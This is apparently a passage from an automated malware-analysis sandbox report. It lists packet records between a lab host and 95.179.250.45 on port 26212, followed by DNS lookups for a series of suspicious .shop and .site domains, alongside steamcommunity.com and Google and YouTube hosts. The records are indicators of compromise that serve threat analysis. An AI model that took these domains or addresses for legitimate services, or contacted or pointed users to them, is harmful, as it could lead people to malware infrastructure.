                                                                          Sep 27, 2024 04:21:19.188601017 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:19.188608885 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.188657999 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.188667059 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.188674927 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.188684940 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.188710928 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.188719988 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.188801050 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.188810110 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.188817978 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.188822031 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.188857079 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.188864946 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.188899994 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.188909054 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.188952923 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.188962936 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189007998 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189009905 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:19.189017057 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189030886 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189040899 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189060926 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189062119 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:19.189073086 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189079046 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:19.189084053 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189109087 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:19.189125061 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:19.189156055 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189167023 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189174891 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189192057 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189201117 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189209938 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:19.189217091 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189225912 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189289093 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189305067 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189316988 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189325094 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189347982 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189383030 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189430952 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189440012 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189460993 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189471006 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189516068 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189532042 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189539909 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189548016 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189563036 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189572096 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189600945 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189651012 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.189698935 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.192997932 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193238974 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193286896 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193295956 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193335056 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193344116 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193377018 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193384886 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193393946 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193437099 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193445921 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193480015 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193489075 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193514109 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193531990 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193567991 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193795919 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:19.193837881 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193850994 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193871021 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:19.193876982 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193907022 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193914890 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193964958 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193974018 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.193998098 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194056988 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194073915 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194133997 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194183111 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194197893 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194206953 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194216013 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194706917 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194715977 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194725990 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194734097 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194741964 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194750071 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194757938 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194766998 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194775105 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194782972 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194791079 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194799900 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194808006 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194816113 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194823980 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194832087 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194840908 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194850922 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194859028 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194865942 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194875002 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194881916 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194897890 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194906950 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194915056 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194924116 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194931984 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194940090 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194947958 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194956064 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194964886 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194972992 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194989920 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.194998026 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.195005894 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.195014000 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.195029020 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.195036888 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.195044041 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.195344925 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:19.195431948 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:19.198723078 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.198734045 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.198769093 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.198776960 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.198786020 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.198801041 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.198811054 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.198848009 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.198857069 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.198940039 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.198947906 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.198956966 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.198965073 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.198982000 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.198991060 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.198998928 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199007988 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199018002 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199043989 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199052095 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199115992 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199124098 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199132919 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199150085 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199157953 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199167013 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199177027 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199194908 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199203968 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199256897 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199265003 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199273109 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199282885 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199292898 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199352026 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199359894 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199368000 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199376106 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199389935 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199405909 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199415922 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199430943 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199440002 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199471951 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199480057 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199532986 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199541092 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199557066 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199565887 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199573040 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199584007 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199661016 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199670076 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.199769020 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200061083 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:19.200122118 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:19.200191975 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200202942 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200249910 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200258017 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200265884 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200282097 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200289965 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200351954 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200360060 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200375080 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200382948 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200422049 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200432062 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200462103 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200470924 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200517893 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200525999 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200546026 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200579882 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200589895 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200644016 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200655937 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200664043 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200669050 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200726986 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200737953 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200746059 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200756073 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200779915 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200789928 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200844049 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200851917 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200860977 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200870991 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200886965 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200987101 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.200995922 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.201004028 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.201013088 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.201028109 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.201035976 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.201044083 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.201051950 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.201108932 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.201117992 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.201126099 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.201134920 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.201150894 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.201159000 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.201167107 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.201195955 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.201204062 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.201211929 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.201231956 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:19.201406956 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:19.201477051 CEST4971426212192.168.2.595.179.250.45
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Sep 27, 2024 04:21:33.946362019 CEST192.168.2.51.1.1.10x2668Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:39.568380117 CEST192.168.2.51.1.1.10x7a02Standard query (0)drawzhotdog.shopA (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:40.882673979 CEST192.168.2.51.1.1.10xa8bcStandard query (0)gutterydhowi.shopA (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:41.811165094 CEST192.168.2.51.1.1.10xe48fStandard query (0)ghostreedmnu.shopA (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:42.843406916 CEST192.168.2.51.1.1.10x82e9Standard query (0)offensivedzvju.shopA (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:43.849666119 CEST192.168.2.51.1.1.10x442dStandard query (0)vozmeatillu.shopA (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:46.017817974 CEST192.168.2.51.1.1.10xbad2Standard query (0)fragnantbui.shopA (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:47.003766060 CEST192.168.2.51.1.1.10x58b0Standard query (0)stogeneratmns.shopA (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:48.022681952 CEST192.168.2.51.1.1.10x3538Standard query (0)reinforcenh.shopA (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:48.961607933 CEST192.168.2.51.1.1.10xa8adStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:50.293917894 CEST192.168.2.51.1.1.10xe0aStandard query (0)ballotnwu.siteA (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:00.413964987 CEST192.168.2.51.1.1.10x1882Standard query (0)youtube.comA (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:00.414109945 CEST192.168.2.51.1.1.10xd137Standard query (0)youtube.com65IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.399667978 CEST192.168.2.51.1.1.10xd529Standard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.399776936 CEST192.168.2.51.1.1.10xfe67Standard query (0)www.youtube.com65IN (0x0001)false
                                                                          Sep 27, 2024 04:22:04.900928020 CEST192.168.2.51.1.1.10xdbfaStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:04.901010036 CEST192.168.2.51.1.1.10xfd2eStandard query (0)www.google.com65IN (0x0001)false
                                                                          Sep 27, 2024 04:22:16.620887995 CEST192.168.2.51.1.1.10xfc51Standard query (0)ballotnwu.siteA (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:33.635339975 CEST192.168.2.51.1.1.10x1879Standard query (0)ballotnwu.siteA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Sep 27, 2024 04:21:33.953068018 CEST1.1.1.1192.168.2.50x2668No error (0)google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:39.579673052 CEST1.1.1.1192.168.2.50x7a02No error (0)drawzhotdog.shop172.67.162.108A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:39.579673052 CEST1.1.1.1192.168.2.50x7a02No error (0)drawzhotdog.shop104.21.58.182A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:40.894968033 CEST1.1.1.1192.168.2.50xa8bcNo error (0)gutterydhowi.shop104.21.4.136A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:40.894968033 CEST1.1.1.1192.168.2.50xa8bcNo error (0)gutterydhowi.shop172.67.132.32A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:41.823556900 CEST1.1.1.1192.168.2.50xe48fNo error (0)ghostreedmnu.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:41.823556900 CEST1.1.1.1192.168.2.50xe48fNo error (0)ghostreedmnu.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:42.856389999 CEST1.1.1.1192.168.2.50x82e9No error (0)offensivedzvju.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:42.856389999 CEST1.1.1.1192.168.2.50x82e9No error (0)offensivedzvju.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:43.861804962 CEST1.1.1.1192.168.2.50x442dNo error (0)vozmeatillu.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:43.861804962 CEST1.1.1.1192.168.2.50x442dNo error (0)vozmeatillu.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:46.030510902 CEST1.1.1.1192.168.2.50xbad2No error (0)fragnantbui.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:46.030510902 CEST1.1.1.1192.168.2.50xbad2No error (0)fragnantbui.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:47.015515089 CEST1.1.1.1192.168.2.50x58b0No error (0)stogeneratmns.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:47.015515089 CEST1.1.1.1192.168.2.50x58b0No error (0)stogeneratmns.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:48.031424046 CEST1.1.1.1192.168.2.50x3538No error (0)reinforcenh.shop172.67.208.139A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:48.031424046 CEST1.1.1.1192.168.2.50x3538No error (0)reinforcenh.shop104.21.77.130A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:48.968296051 CEST1.1.1.1192.168.2.50xa8adNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:50.312491894 CEST1.1.1.1192.168.2.50xe0aNo error (0)ballotnwu.site104.21.2.13A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:21:50.312491894 CEST1.1.1.1192.168.2.50xe0aNo error (0)ballotnwu.site172.67.128.144A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:00.420838118 CEST1.1.1.1192.168.2.50x1882No error (0)youtube.com142.250.181.238A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:00.421181917 CEST1.1.1.1192.168.2.50xd137No error (0)youtube.com65IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.406397104 CEST1.1.1.1192.168.2.50xd529No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.406397104 CEST1.1.1.1192.168.2.50xd529No error (0)youtube-ui.l.google.com216.58.212.174A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.406397104 CEST1.1.1.1192.168.2.50xd529No error (0)youtube-ui.l.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.406397104 CEST1.1.1.1192.168.2.50xd529No error (0)youtube-ui.l.google.com142.250.185.110A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.406397104 CEST1.1.1.1192.168.2.50xd529No error (0)youtube-ui.l.google.com142.250.185.206A (IP address)IN (0x0001)false
